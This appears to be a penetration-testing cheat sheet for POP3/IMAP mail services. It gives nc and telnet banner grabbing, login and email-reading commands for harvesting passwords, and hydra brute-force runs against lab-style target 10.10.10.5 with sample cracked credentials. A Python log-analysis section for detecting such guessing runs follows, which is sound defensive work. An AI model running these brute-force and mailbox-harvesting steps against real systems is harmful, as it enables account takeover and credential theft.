POP3 (110/995) / IMAP (143/993)

Version info — Check for exploits

nc -nv $IP 110
nc -nv $IP 143
Example Output
telnet 10.10.10.5 110
+OK Dovecot POP3 ready <1234.abc@target>

telnet 10.10.10.5 143
* OK [CAPABILITY IMAP4rev1] Dovecot IMAP ready
(Check version: Dovecot 2.2.x has known auth bypass CVEs)

Login with found creds

Try creds from other services — Read emails for more creds

telnet $IP 110
USER <user>
PASS <pass>
Example Output
telnet 10.10.10.5 110
+OK POP3 server ready
USER admin
+OK
PASS admin123
+OK Logged in.
LIST
1 1024
2 2048
(2 emails to read)

List and read emails

After POP3 login — Emails often contain passwords

LIST
RETR 1
RETR 2
Example Output
RETR 1
From: sysadmin@corp.local
Subject: New server credentials

Hi, the new server password is: Summer2024!
Please change it ASAP.
(CREDENTIALS IN EMAIL)

Brute force

If you have a username — Weak mail passwords

hydra -l <user> -P passwords.txt $IP pop3
Example Output
hydra -l admin -P rockyou.txt 10.10.10.5 pop3
[110][pop3] login: admin password: welcome1

hydra -l admin -P rockyou.txt 10.10.10.5 imap
[143][imap] login: admin password: welcome1
(Now read their emails for creds/info)
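
Detecting this from the server side (added example, not part of the original notes): the guessing run above, followed by a successful login from the same source, shows up in the mail server's login log. The sketch assumes Dovecot's default login-log line format; the sample lines are constructed, and analyze() and its threshold are hypothetical names and values.

```python
import re
from collections import defaultdict

# Constructed sample lines in Dovecot's default login-log style (not from the page).
SAMPLE_LOG = """\
Jan 10 12:00:01 mail dovecot: pop3-login: Disconnected (auth failed, 3 attempts in 6 secs): user=<admin>, method=PLAIN, rip=10.10.10.99, lip=10.10.10.5, session=<a1>
Jan 10 12:00:08 mail dovecot: pop3-login: Disconnected (auth failed, 3 attempts in 6 secs): user=<admin>, method=PLAIN, rip=10.10.10.99, lip=10.10.10.5, session=<a2>
Jan 10 12:00:15 mail dovecot: imap-login: Aborted login (auth failed, 2 attempts in 4 secs): user=<admin>, method=PLAIN, rip=10.10.10.99, lip=10.10.10.5, session=<a3>
Jan 10 12:00:20 mail dovecot: pop3-login: Login: user=<admin>, method=PLAIN, rip=10.10.10.99, lip=10.10.10.5, mpid=4242, session=<a4>
Jan 10 12:05:00 mail dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<bob>, method=PLAIN, rip=192.0.2.7, lip=10.10.10.5, TLS, session=<b1>
Jan 10 12:05:30 mail dovecot: imap-login: Login: user=<bob>, method=PLAIN, rip=192.0.2.7, lip=10.10.10.5, mpid=4250, TLS, session=<b2>
"""

# Failed-auth disconnects carry the attempt count, the user and the remote IP (rip).
FAIL = re.compile(r"(?:pop3|imap)-login: .*\(auth failed, (\d+) attempts? in \d+ secs\): "
                  r"user=<([^>]*)>.*?\brip=([0-9a-fA-F.:]+)")
# Successful logins are logged as "Login: user=<...>, ... rip=...".
OK = re.compile(r"(?:pop3|imap)-login: Login: user=<([^>]*)>.*?\brip=([0-9a-fA-F.:]+)")


def analyze(log_text, threshold=5):
    """Return (noisy_sources, suspect_logins).

    noisy_sources: {rip: failed attempts} for sources at or above threshold.
    suspect_logins: [(user, rip)] where a success follows that many failures
    from the same source, i.e. an account whose password was likely guessed.
    """
    failures = defaultdict(int)
    suspect = []
    for line in log_text.splitlines():
        m = FAIL.search(line)
        if m:
            failures[m.group(3)] += int(m.group(1))
            continue
        m = OK.search(line)
        if m and failures[m.group(2)] >= threshold:
            suspect.append((m.group(1), m.group(2)))
    noisy = {ip: n for ip, n in failures.items() if n >= threshold}
    return noisy, suspect


if __name__ == "__main__":
    noisy, suspect = analyze(SAMPLE_LOG)
    print("sources over threshold:", noisy)
    print("logins following a guessing run:", suspect)
```

Any account listed in the second result should have its password rotated and its mailbox reviewed for stored credentials, since the notes above show that is what gets read next.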